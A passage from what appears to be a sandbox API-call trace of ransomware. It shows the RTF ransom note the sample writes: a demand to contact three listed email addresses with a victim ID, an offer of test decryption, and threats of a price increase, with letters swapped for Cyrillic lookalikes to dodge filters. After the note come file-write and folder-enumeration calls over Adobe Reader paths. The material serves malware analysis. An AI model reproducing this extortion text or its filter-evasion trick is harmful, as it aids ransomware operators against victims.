r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.024] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.026] CloseHandle (hObject=0x1cc) returned 1 [0068.026] Sleep (dwMilliseconds=0x3e8) [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount2=80) returned 3 [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 1 [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 1 [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount2=80) returned 1 [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount2=80) returned 1 [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount2=80) returned 2 [0070.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\", cchCount2=64) returned 3 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\", cchCount2=64) returned 3 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 1 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount2=80) returned 2 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 3 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 1 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount2=80) returned 3 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 1 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 1 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount2=80) returned 1 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\", cchCount2=80) returned 3 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\", cchCount2=80) returned 1 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\", cchCount2=80) returned 3 [0070.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 3 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 1 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 3 [0070.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\", cchCount2=80) returned 3 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\", cchCount2=80) returned 3 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 2 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 3 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 2 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 1 [0070.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 1 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 3 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\", cchCount2=80) returned 2 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 1 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount2=80) returned 2 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 3 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 2 [0070.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\", 